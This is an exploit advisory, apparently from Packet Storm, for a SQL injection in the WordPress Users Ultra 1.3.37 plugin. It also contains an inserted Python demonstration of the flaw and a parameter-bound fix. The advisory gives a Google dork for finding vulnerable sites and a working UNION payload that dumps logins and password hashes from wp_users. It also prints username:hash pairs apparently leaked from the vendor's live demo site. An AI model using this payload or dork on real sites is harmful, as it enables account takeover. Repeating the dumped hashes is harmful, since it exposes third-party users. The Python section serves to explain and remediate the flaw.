WordPress Users Ultra 1.3.37 SQL Injection

2014-09-29T00:00:00
ID PACKETSTORM:128473
Type packetstorm
Reporter XroGuE
Modified 2014-09-29T00:00:00

Description

`#################################################################################################  
# Title : WordPress Users Ultra Plugin - SQL Injection Vulnerability  
# Risk : High+/Critical  
# Author : XroGuE  
# Google Dork : inurl: wp-content/plugins/users-ultra/  
# Plugin Version : 1.3.37  
# Plugin Name : Users Ultra  
# Plugin Download Link : https://downloads.wordpress.org/plugin/users-ultra.zip  
# Vendor Home : http://www.usersultra.com/  
# Date : 2014/09/27  
# Tested in : Win7 - Linux  
##################################################################################################  
# Description:   
# This vulnerability is present in both versions of the plugin (Free and Pro).  
# Exploitation requires a logged-in member account: send or receive a message to obtain a message ID, then inject into the view parameter of the messages module that carries that ID.  
# The vendor demo is affected as well; check it at this link: http://usersultra.com/uultra-testing/  
#  
# PoC :  
#  
# http://localhost/wp/?page_id=117&module=messages&view=[id]  
#  
# Proof :  
#  
# http://www.aparat.com/v/vNI81  
# http://www.myblog.att4ck3r.ir/wordpress-users-ultra-plugin-sql-injection-vulnerability/  
#  
##################################################################################################  
#  
# Demo :  
#  
# http://localhost/wp/?page_id=117&module=messages&view=1+and+1=0 union all select 1,2,3,group_concat(user_login,0x3a,user_pass),5,6,7,8,9,10 from+wp_users--  
# => Users: admin:$P$BsrGHnd./mOlHkK15iHCn81gjJQekC.,test:$P$Bmfp8cwwTYKxKlPQZSJtjVfa4Vw11o1  
#  
#  
# http://usersultra.com/uultra-testing/myaccount/?module=messages&view=63 and 1=0 union all select 1,2,3,group_concat(user_login,0x3a,user_pass),5,6,7,8,9,10 from+wp_users--  
# => Users: admin:$P$BN.dvG/wrbH1RPFn2DHAkqr6G6NrKs1,franco_zuna:$P$Bakm4N8i/uS/VDjVfQ6oeSYRJWGZ4n.,test:$P$BRraCwdfKm2WGnnukOORsHDhfWmXVv/,adan_brock:$P$BmbyJbV5L8wf.xaRWxHyjAGMz/2UxL.,sean_daze:$P$B0mbw9c/W96/4SlTAkkLGePMqqgZKX1,allnetprovider-z:$P$BuEBNJXebTD3j5gmNqSNsZd8dwQUJb.,Ali28:$P$BeMVJLGapu6EF7FdBtPtKdxGZTKBgl1,Rolan-Deri:$P$Bf/Yt2IEEPxlURhBjPkA3UXyCLIuAX/,louis_h_central_geek:$P$BsYPVcay/T4t4HRSaG0j89mmJPMGjw1  
#  
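The flaw class behind the demo above, as an added example that is not the plugin's code: Python with SQLite stands in for the MySQL-backed WordPress handler, and the table layout, column names, placeholder hashes and the view_message_* function names are assumptions. The vulnerable handler concatenates the view parameter into the query text, so the UNION payload works as long as it selects the same number of columns as the original query (ten here, which is why the advisory's payload pads with 1..10); 0x3a in the original payload is the colon that separates login from hash in group_concat output, written with || below because SQLite's group_concat takes a single expression. The hardened handler casts and binds the ID, which in a WordPress plugin corresponds to $wpdb->prepare() with a %d placeholder.

```python
import sqlite3

# Constructed sample data; these are placeholder hashes, not values from the
# advisory or the vendor demo.
SAMPLE_USERS = [
    ("admin", "$P$BplaceholderHashForAdmin000000000"),
    ("test", "$P$BplaceholderHashForTest0000000000"),
]


def build_db():
    """Create an in-memory SQLite database with a wp_users table and a
    10-column messages table (column names are assumptions; only the count
    matters, because the advisory's UNION payload selects 10 columns)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT)"
    )
    conn.executemany(
        "INSERT INTO wp_users (user_login, user_pass) VALUES (?, ?)", SAMPLE_USERS
    )
    conn.execute(
        """CREATE TABLE messages (
               id INTEGER PRIMARY KEY, sender_id INTEGER, recipient_id INTEGER,
               subject TEXT, body TEXT, sent_at TEXT, is_read INTEGER,
               parent_id INTEGER, deleted INTEGER, extra TEXT)"""
    )
    conn.execute(
        "INSERT INTO messages VALUES (1, 2, 1, 'hello', 'first message', "
        "'2014-09-27', 0, 0, 0, '')"
    )
    return conn


def view_message_vulnerable(conn, view):
    """Flaw class from the advisory: the untrusted view GET parameter is
    concatenated straight into the SQL text, so any SQL it carries runs."""
    sql = "SELECT * FROM messages WHERE id = " + view
    return conn.execute(sql).fetchall()


def view_message_fixed(conn, view):
    """Hardened form: cast to int and bind as a parameter. In a WordPress
    plugin the equivalent is $wpdb->prepare('... WHERE id = %d', $view)."""
    try:
        message_id = int(view)
    except (TypeError, ValueError):
        return []
    return conn.execute(
        "SELECT * FROM messages WHERE id = ?", (message_id,)
    ).fetchall()


# The advisory's payload. MySQL's group_concat(a, 0x3a, b) joins with a colon
# (0x3a); SQLite's group_concat takes one expression, so the concatenation is
# written with || instead. Ten selected columns match the ten-column table.
PAYLOAD = (
    "1 and 1=0 union all select 1,2,3,"
    "group_concat(user_login || ':' || user_pass),5,6,7,8,9,10 "
    "from wp_users--"
)


def leaked_credentials(conn):
    """Run the payload through the vulnerable handler and return the
    login:hash pairs that come back in the fourth column of the result."""
    rows = view_message_vulnerable(conn, PAYLOAD)
    return rows[0][3].split(",")


if __name__ == "__main__":
    db = build_db()
    print("vulnerable handler leaks:", leaked_credentials(db))
    print("fixed handler returns:", view_message_fixed(db, PAYLOAD))
```

The "1 and 1=0" prefix empties the legitimate result set so that the only row rendered on the page is the one supplied by the UNION; the fixed handler rejects the whole payload because it is not an integer, and a non-numeric message ID simply yields no message.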
##################################################################################################  
#  
# Discovered By : XroGuE  
# Website : http://www.Att4ck3r.ir  
# E-Mail : info[at]att4ck3r[Dot]ir  
#  
##################################################################################################  
`